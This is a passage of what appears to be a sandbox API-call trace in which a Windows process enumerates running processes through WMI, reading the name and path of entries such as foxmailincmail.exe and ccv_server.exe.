lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.349] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.349] IWbemClassObject:Get (in: This=0x552bea0, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e3e18*=0, plFlavor=0x23e3e1c*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="foxmailincmail.exe", varVal2=0x0), pType=0x23e3e18*=8, plFlavor=0x23e3e1c*=0) returned 0x0 [0265.349] SysStringByteLen (bstr="foxmailincmail.exe") returned 0x24 [0265.349] SysStringByteLen (bstr="foxmailincmail.exe") returned 0x24 [0265.350] IWbemClassObject:Get (in: This=0x552bea0, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e3e18*=8, plFlavor=0x23e3e1c*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="foxmailincmail.exe", varVal2=0x0), pType=0x23e3e18*=8, plFlavor=0x23e3e1c*=0) returned 0x0 [0265.350] SysStringByteLen (bstr="foxmailincmail.exe") returned 0x24 [0265.350] SysStringByteLen (bstr="foxmailincmail.exe") returned 0x24 [0265.350] CoTaskMemAlloc (cb=0x4) returned 0x54ba2d8 [0265.350] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2d8*=0x552ce90, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.350] IUnknown:QueryInterface (in: This=0x552ce90, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x552ce90) returned 0x0 [0265.351] IUnknown:QueryInterface (in: This=0x552ce90, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.351] IUnknown:QueryInterface (in: This=0x552ce90, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.351] IUnknown:QueryInterface (in: This=0x552ce90, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.351] IUnknown:AddRef (This=0x552ce90) returned 0x3 [0265.351] IUnknown:QueryInterface (in: This=0x552ce90, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.351] IUnknown:QueryInterface (in: This=0x552ce90, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.351] IUnknown:QueryInterface (in: This=0x552ce90, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x552ce94) returned 0x0 [0265.351] IMarshal:GetUnmarshalClass (in: This=0x552ce94, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.351] IUnknown:Release (This=0x552ce94) returned 0x3 [0265.352] IUnknown:QueryInterface (in: This=0x552ce90, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.352] IUnknown:Release (This=0x552ce90) returned 0x2 [0265.352] IUnknown:QueryInterface (in: This=0x552ce90, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x552ce90) returned 0x0 [0265.352] IUnknown:AddRef (This=0x552ce90) returned 0x4 [0265.352] IUnknown:Release (This=0x552ce90) returned 0x3 [0265.352] IUnknown:Release (This=0x552ce90) returned 0x2 [0265.352] CoTaskMemFree (pv=0x54ba2d8) [0265.352] IUnknown:AddRef (This=0x552ce90) returned 0x3 [0265.352] IWbemClassObject:Get (in: This=0x552ce90, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.352] IWbemClassObject:Get (in: This=0x552ce90, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4352\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.352] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4352\"") returned 0x5e [0265.352] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4352\"") returned 0x5e [0265.352] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.353] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.353] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.353] IUnknown:Release (This=0x601a94) returned 0x1 [0265.353] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba3b8) returned 0x0 [0265.354] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba3b8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.354] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba3b8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5529cf8) returned 0x0 [0265.354] WbemDefPath:IUnknown:Release (This=0x54ba3b8) returned 0x0 [0265.354] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529cf8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5529cf8) returned 0x0 [0265.354] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529cf8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.354] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529cf8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.354] WbemDefPath:IUnknown:AddRef (This=0x5529cf8) returned 0x3 [0265.354] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529cf8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.354] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529cf8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.354] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529cf8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5537be8) returned 0x0 [0265.354] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5537be8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.354] WbemDefPath:IUnknown:Release (This=0x5537be8) returned 0x3 [0265.355] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529cf8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.355] WbemDefPath:IUnknown:Release (This=0x5529cf8) returned 0x2 [0265.355] WbemDefPath:IUnknown:Release (This=0x5529cf8) returned 0x1 [0265.355] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529cf8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5529cf8) returned 0x0 [0265.355] WbemDefPath:IUnknown:AddRef (This=0x5529cf8) returned 0x3 [0265.355] WbemDefPath:IUnknown:Release (This=0x5529cf8) returned 0x2 [0265.355] WbemDefPath:IWbemPath:SetText (This=0x5529cf8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4352\"") returned 0x0 [0265.355] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.355] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.355] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.355] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.355] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.355] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.355] IWbemClassObject:Get (in: This=0x552ce90, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e46c4*=0, plFlavor=0x23e46c8*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ccv_server.exe", varVal2=0x0), pType=0x23e46c4*=8, plFlavor=0x23e46c8*=0) returned 0x0 [0265.355] SysStringByteLen (bstr="ccv_server.exe") returned 0x1c [0265.355] SysStringByteLen (bstr="ccv_server.exe") returned 0x1c [0265.355] IWbemClassObject:Get (in: This=0x552ce90, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e46c4*=8, plFlavor=0x23e46c8*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ccv_server.exe", varVal2=0x0), pType=0x23e46c4*=8, plFlavor=0x23e46c8*=0) returned 0x0 [0265.356] SysStringByteLen (bstr="ccv_server.exe") returned 0x1c [0265.356] SysStringByteLen (bstr="ccv_server.exe") returned 0x1c [0265.356] CoTaskMemAlloc (cb=0x4) returned 0x54ba2d8 [0265.356] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2d8*=0x552b9d8, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.356] IUnknown:QueryInterface (in: This=0x552b9d8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x552b9d8) returned 0x0 [0265.356] IUnknown:QueryInterface (in: This=0x552b9d8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.356] IUnknown:QueryInterface (in: This=0x552b9d8, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.357] IUnknown:QueryInterface (in: This=0x552b9d8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.357] IUnknown:AddRef (This=0x552b9d8) returned 0x3 [0265.357] IUnknown:QueryInterface (in: This=0x552b9d8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.357] IUnknown:QueryInterface (in: This=0x552b9d8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.357] IUnknown:QueryInterface (in: This=0x552b9d8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x552b9dc) returned 0x0 [0265.357] IMarshal:GetUnmarshalClass (in: This=0x552b9dc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.357] IUnknown:Release (This=0x552b9dc) returned 0x3 [0265.357] IUnknown:QueryInterface (in: This=0x552b9d8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.357] IUnknown:Release (This=0x552b9d8) returned 0x2 [0265.357] IUnknown:QueryInterface (in: This=0x552b9d8, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x552b9d8) returned 0x0 [0265.357] IUnknown:AddRef (This=0x552b9d8) returned 0x4 [0265.357] IUnknown:Release (This=0x552b9d8) returned 0x3 [0265.357] IUnknown:Release (This=0x552b9d8) returned 0x2 [0265.357] CoTaskMemFree (pv=0x54ba2d8) [0265.357] IUnknown:AddRef (This=0x552b9d8) returned 0x3 [0265.357] IWbemClassObject:Get (in: This=0x552b9d8, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.358] IWbemClassObject:Get (in: This=0x552b9d8, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4360\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.358] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4360\"") returned 0x5e [0265.358] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4360\"") returned 0x5e [0265.358] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.358] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.358] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.358] IUnknown:Release (This=0x601a94) returned 0x1 [0265.359] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2d8) returned 0x0 [0265.359] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.359] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552a708) returned 0x0 [0265.359] WbemDefPath:IUnknown:Release (This=0x54ba2d8) returned 0x0 [0265.359] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a708, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552a708) returned 0x0 [0265.359] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a708, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.359] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a708, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.359] WbemDefPath:IUnknown:AddRef (This=0x552a708) returned 0x3 [0265.359] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a708, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.359] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a708, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.359] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a708, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5537e10) returned 0x0 [0265.359] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5537e10, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.359] WbemDefPath:IUnknown:Release (This=0x5537e10) returned 0x3 [0265.360] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a708, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.360] WbemDefPath:IUnknown:Release (This=0x552a708) returned 0x2 [0265.360] WbemDefPath:IUnknown:Release (This=0x552a708) returned 0x1 [0265.360] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a708, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552a708) returned 0x0 [0265.360] WbemDefPath:IUnknown:AddRef (This=0x552a708) returned 0x3 